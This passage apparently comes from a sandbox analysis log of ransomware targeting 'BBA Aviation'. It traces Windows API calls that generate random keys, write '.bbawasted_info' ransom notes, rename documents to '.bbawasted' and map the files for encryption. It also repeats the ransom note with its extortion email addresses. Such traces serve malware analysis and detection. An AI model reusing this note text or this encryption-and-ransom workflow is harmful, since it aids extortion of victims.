_Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]WhjwAydlcuFbxDOiomYOrV5DIu2INd9H8DXrHdSDcoNsX3cNdsk5p/4FE89S2Hs2\r\nEiA8oKXI14k5tS1XUM+cD2SA92SEK+5G4j/k6/Nr8dQy4QUo96LbIxj51Tn7s5yp\r\nG7mSl7p4izGFIqwYhVGs0yAT4tDOUehuFk/ODVSlskpK7QgMgDHm80GG3HiDI/3u\r\ngsM+7xFXTesIUtFEn+BD+JAAWIC8Gs9stLLDJPZdJ8eYHozMHOdL1USmKxQ15INz\r\no2QfdICI4e4tE6yUnuhny6ukEykf3fncmwAlOBTwyYjOV+4/ICC/hukVoyWJrYqS\r\ny6dMywAH6RS3ZBMBwbX/67OfKC7bDzaTstge9BETW4YZ9AR56Au2kQUDW0f/ZutU\r\nqI7ALuKaMU45oM9VQR7FDlHlH8rqTixnM8JkvW1irOVli3JIqCDE1DgEnFyHwTke\r\noQ6ckP3Yymc/siUgYE2s74+1pIHFzRZOjdcrEYA6FeAxbapLeBb9sGds5tPCU2At\r\nsBJZR2w2V5RLpKoYaMfVyvY9LZLOgBOdEiQ9avPZ5lR5kSgbk5oUPHcQk0tXipep\r\nBiWweme1OevUozlN7rzXExGux7jpNP3AtjbFEiFf5CBqcBZaC5pIxQYA3QtwCu5L\r\nSKdZNgwnym/WEglQK+Uwg5CidnnF4J+u2qjaqNvFcc/=[end_key]\r\nKEEP IT\r\n") returned 984 [0216.780] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0216.780] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0216.780] SetEndOfFile (hFile=0x28c) returned 1 [0216.783] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0216.783] CloseHandle (hObject=0x28c) returned 1 [0216.783] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0216.784] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b64d8 | out: hHeap=0x660000) returned 1 [0216.784] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6130) returned 1 [0216.785] CryptGenRandom (in: hProv=0x6a6130, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0216.785] CryptReleaseContext (hProv=0x6a6130, dwFlags=0x0) returned 1 [0216.785] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\jUWRIQHH\\lIVuJ1I1Z-q Wd.pps") returned 62 [0216.785] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x286) returned 0x6aecf0 [0216.785] lstrcpyW (in: lpString1=0x6aed6c, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0216.785] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0216.786] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a6c58) returned 1 [0216.786] CryptGenRandom (in: hProv=0x6a6c58, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0216.786] CryptReleaseContext (hProv=0x6a6c58, dwFlags=0x0) returned 1 [0216.786] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\jUWRIQHH\\lIVuJ1I1Z-q Wd.pps.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\documents\\ph3m\\juwriqhh\\livuj1i1z-q wd.pps.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0216.787] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0216.788] SetEndOfFile (hFile=0x28c) returned 1 [0216.788] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0216.788] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0216.788] lstrcpyW (in: lpString1=0x6aed6c, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0216.788] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\jUWRIQHH\\lIVuJ1I1Z-q Wd.pps" (normalized: "c:\\users\\fd1hvy\\documents\\ph3m\\juwriqhh\\livuj1i1z-q wd.pps"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\jUWRIQHH\\lIVuJ1I1Z-q Wd.pps.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\ph3m\\juwriqhh\\livuj1i1z-q wd.pps.bbawasted")) returned 1 [0216.790] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\jUWRIQHH\\lIVuJ1I1Z-q Wd.pps.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\ph3m\\juwriqhh\\livuj1i1z-q wd.pps.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0216.790] CreateFileMappingW (hFile=0x290, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0216.790] GetFileSize (in: hFile=0x290, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0xfda2 [0216.790] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xfda2) returned 0x5f0000 [0216.790] CloseHandle (hObject=0x290) returned 1 [0216.792] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0216.793] CloseHandle (hObject=0x294) returned 1 [0216.793] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x6b6398 [0216.793] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a68a0) returned 1 [0216.794] CryptGenRandom (in: hProv=0x6a68a0, dwLen=0x1b8, pbBuffer=0x6b63e0 | out: pbBuffer=0x6b63e0) returned 1 [0216.794] CryptReleaseContext (hProv=0x6a68a0, dwFlags=0x0) returned 1 [0216.794] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a6818) returned 1 [0216.795] CryptGenRandom (in: hProv=0x6a6818, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0216.795] CryptReleaseContext (hProv=0x6a6818, dwFlags=0x0) returned 1 [0216.806] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0216.806] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b6398 | out: hHeap=0x660000) returned 1 [0216.807] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0216.807] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]KSCJkE+7ZzLrtDiKNWKo1hA+ZL0PQwApz0Pym/KexJlJzy/HRpn04DBc4rzAWQEe\r\nYA22GpIGNQnPparSsZIBFVXWK55bV/9KqDxBn6qrZf9hXisDStEQeUdcI3U/Fg3/\r\ns3kFQFxttZfgz83Fy6Tp/ut/RqVbQ2P+MRXFgHP7SE28v4FSlJhDKFspOz4s34By\r\nJ7Tu+OrqN6T5aSlYMmVP3jfxOBUvADqoq7Bj0EPTVB7d4xfpqxc1WPpk4BepFbv9\r\nJiRaiyU1tPkrgTAysRXwpjy0Wtm1u9wYjCObuFWjvo6pO6OWU2c22h5o1oBrEhkn\r\n/pBrdl3So2Ob+fQCfQRMwQE+lzNzr0pt6qmZ5SXrE1Qe3AfSchjcKgWc5JS+Db2H\r\nnbxhibJ980oFGuYoe+aQ0KdUvmRdT/wup+TJ4MxZ1nmiJUgc22hbioUSEiJrTmc7\r\nN+lsLsGkw4bv7POnT2u009mvLLjE50GMWH5QnAEpLHvsehOYYXbMHjO+zhBlASEw\r\nRpyNmsKoJWKnrENED8jQ1cvu2QN9nFOU8cGIbAfOx9xcB7rQRDEHRdvPRtB7u1h1\r\nPQ7nB9qYbHLM/bFrRz50xHzFPpGLIMLvnEKrtrRdhpZtPxFJNcbgOYIgNWp5q25+\r\n0mJv+WMLOykJMErtzz/Yy3K7zWbF8HS2sj3bCowBXzc=[end_key]\r\nKEEP IT\r\n") returned 984 [0216.807] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0216.807] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0216.807] SetEndOfFile (hFile=0x28c) returned 1 [0216.810] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0216.810] CloseHandle (hObject=0x28c) returned 1 [0216.810] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0216.810] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a7f00 | out: hHeap=0x660000) returned 1 [0216.810] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6b48) returned 1 [0216.811] CryptGenRandom (in: hProv=0x6a6b48, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0216.811] CryptReleaseContext (hProv=0x6a6b48, dwFlags=0x0) returned 1 [0216.811] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\jUWRIQHH\\sxX25Ub.ods") returned 55 [0216.811] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x278) returned 0x6aecf0 [0216.811] lstrcpyW (in: lpString1=0x6aed5e, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0216.811] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0216.811] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a6928) returned 1 [0216.812] CryptGenRandom (in: hProv=0x6a6928, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0216.812] CryptReleaseContext (hProv=0x6a6928, dwFlags=0x0) returned 1 [0216.812] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\jUWRIQHH\\sxX25Ub.ods.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\documents\\ph3m\\juwriqhh\\sxx25ub.ods.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0217.069] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0217.070] SetEndOfFile (hFile=0x28c) returned 1 [0217.071] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0217.071] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0217.071] lstrcpyW (in: lpString1=0x6aed5e, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0217.071] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\jUWRIQHH\\sxX25Ub.ods" (normalized: "c:\\users\\fd1hvy\\documents\\ph3m\\juwriqhh\\sxx25ub.ods"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\jUWRIQHH\\sxX25Ub.ods.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\ph3m\\juwriqhh\\sxx25ub.ods.bbawasted")) returned 1 [0217.072] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\jUWRIQHH\\sxX25Ub.ods.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\ph3m\\juwriqhh\\sxx25ub.ods.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0217.072] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x290 [0217.072] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x1735e [0217.073] MapViewOfFile (hFileMappingObject=0x290, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1735e) returned 0x5f0000 [0217.073] CloseHandle (hObject=0x294) returned 1 [0217.075] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0217.076] CloseHandle (hObject=0x290) returned 1 [0217.076] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x6b6398 [0217.077] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a6818) returned 1 [0217.077] CryptGenRandom (in: hProv=0x6a6818, dwLen=0x1b8, pbBuffer=0x6b63e0 | out: pbBuffer=0x6b63e0) returned 1 [0217.077] CryptReleaseContext (hProv=0x6a6818, dwFlags=0x0) returned 1 [0217.077] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a61b8) returned 1 [0217.078] CryptGenRandom (in: hProv=0x6a61b8, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0217.078] CryptReleaseContext (hProv=0x6a61b8, dwFlags=0x0) returned 1 [0217.086] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0217.086] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b6398 | out: hHeap=0x660000) returned 1 [0217.086] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0217.086] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]b6RNUHRxioDYksprqo9lEI7XKdQIniXq/beerqImeM1hbcdmrcLsqi7vu67m4JLE\r\njviSl5wCdAnQk679THVnd8+zFry3vIfy88rAPUEJjpPlI7Nd/hnT+/obrTbQHdD4\r\nJ0Io8LXwGbDnceqpilVxl34uIlIBbwnjzCuGCC+E4tJk5D+cpZd8oSyQs4z1YFZQ\r\ndRxPU3VJCJG2Vaw4bzJfKUlXultQ9S+lypvXRqhcNgwGpe5/vMUmMD0w/CTgTjFz\r\ntTUy6TnWs+ptyAwTps/tzsXf5+ROQNRt/KTllU3ALbN2nzDVJYcBYPh89EaU5cFV\r\nZR6hVL6bKg1EI8vW4La0TM746CqfyIIstApWJr+C4dQF59DrQrZ+LP5suDJPYRYC\r\nMmPDWG9sMPNjhn3Aw1a4DmhNooa9Zz2DOe73zoORQ/oym1Y3O9WTDl9RozsdjPPb\r\ne4ZxnzRUI/gcYUPWFoaTtxXdYdWjr7iCVlLrwjFDuDPhSP+HylSkvHagSjYaRtQb\r\nRKrjx5Q5GRcKRLt3ztKKkM7khvqv9VsT1pxs81CfK7P+rqqpbedwgvmi1e0x/Wa7\r\nd/oQqzRSNCGxz8T+eWWnyWjAnneq3eR5G/gY/W3COn6ITGdrby8HUs/Fuy6ig/9m\r\n15c5i3nMtzV8K/eV7rmiva98qCap3OhFO0yaELSfBOK=[end_key]\r\nKEEP IT\r\n") returned 984 [0217.086] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0217.086] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0217.087] SetEndOfFile (hFile=0x28c) returned 1 [0217.089] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0217.089] CloseHandle (hObject=0x28c) returned 1 [0217.089] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0217.089] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b0268 | out: hHeap=0x660000) returned 1 [0217.089] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6c58) returned 1 [0217.090] CryptGenRandom (in: hProv=0x6a6c58, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0217.090] CryptReleaseContext (hProv=0x6a6c58, dwFlags=0x0) returned 1 [0217.090] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\jUWRIQHH\\vTejfZfO.doc") returned 56 [0217.090] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x27a) returned 0x6aecf0 [0217.090] lstrcpyW (in: lpString1=0x6aed60, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0217.090] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0217.090] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a6bd0) returned 1 [0217.090] CryptGenRandom (in: hProv=0x6a6bd0, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0217.090] CryptReleaseContext (hProv=0x6a6bd0, dwFlags=0x0) returned 1 [0217.090] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\jUWRIQHH\\vTejfZfO.doc.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\documents\\ph3m\\juwriqhh\\vtejfzfo.doc.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0217.091] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0217.092] SetEndOfFile (hFile=0x28c) returned 1 [0217.092] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0217.092] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0217.092] lstrcpyW (in: lpString1=0x6aed60, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0217.092] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\jUWRIQHH\\vTejfZfO.doc" (normalized: "c:\\users\\fd1hvy\\documents\\ph3m\\juwriqhh\\vtejfzfo.doc"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\jUWRIQHH\\vTejfZfO.doc.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\ph3m\\juwriqhh\\vtejfzfo.doc.bbawasted")) returned 1 [0217.093] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\jUWRIQHH\\vTejfZfO.doc.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\ph3m\\juwriqhh\\vtejfzfo.doc.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0217.093] CreateFileMappingW (hFile=0x290, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0217.093] GetFileSize (in: hFile=0x290, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x15a4b [0217.093] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x15a4b) returned 0x5f0000 [0217.094] CloseHandle (hObject=0x290) returned 1 [0217.096] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0217.097] CloseHandle (hObject=0x294) returned 1 [0217.097] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x6b6398 [0217.097] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a69b0) returned 1 [0217.097] CryptGenRandom (in: hProv=0x6a69b0, dwLen=0x1b8, pbBuffer=0x6b63e0 | out: pbBuffer=0x6b63e0) returned 1 [0217.098] CryptReleaseContext (hProv=0x6a69b0, dwFlags=0x0) returned 1 [0217.098] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a5f10) returned 1 [0217.112] CryptGenRandom (in: hProv=0x6a5f10, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0217.112] CryptReleaseContext (hProv=0x6a5f10, dwFlags=0x0) returned 1 [0217.121] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0217.121] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b6398 | out: hHeap=0x660000) returned 1 [0217.121] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0217.121] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]QJZiEbqt4IUsOIAqX1IYtmHDepAHTUX0wkj2vsoo2jMMw6ba5h4r/ucD4/Bcx7DF\r\nw5DkCSAjeGhePPP1vk2nN2Hy1n1BcEa8XlwQZvyYQWHv/FFFMBkIzjxYf5d4l6vu\r\nDZyNccE8CeBMrs7b96YCbNFza8Eu5P+j3EQUpMrU4ywcvRm1TZRkQ9UNoHLweTz0\r\nmOMCrvmJdECuetm7DbEDcxjYSJwZZeZnkKgCuDxt7ojSmG+dqvBymCuXDsyxXcVV\r\nkGQpkMYBB6eacq5SzjFhT8oUH2NANUkEhbpu3XLW45ylEcReu9MvZ0EJbJO1r6o6\r\nV6Yh7V30g9rCIL6nYUm2teQ8QYQVgXIMsMMGaJVlr3yvf0hprCi51nITM6sJPT/7\r\n74lM39ediVKw1bHhT9Wclpw9t1u0E4c6it8dOGbZWJAhweAoD/oIp0nmMT95FRGM\r\nppycq4tbZl2V8T//XYTZVYeTmbWON7fpiTdi0RJXNPBCyVUmkMl8asJzLFYQwMXS\r\nqug/hQyXy+tJYsfi5tOv6zUNRHxF+OCbfYMwOuYVch1vx76AsFSvi54PRgxGid6w\r\nAjPtK8sx/AavCy8RAY+mHn/l3wNTVNQzoLz5a/kWf20ubXDne2/loA9Tg+dLDBmZ\r\nI9B68qCQe85FIBow5OtZo6AvdSOZvFe4/q6/OjnKmCX=[end_key]\r\nKEEP IT\r\n") returned 984 [0217.121] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: 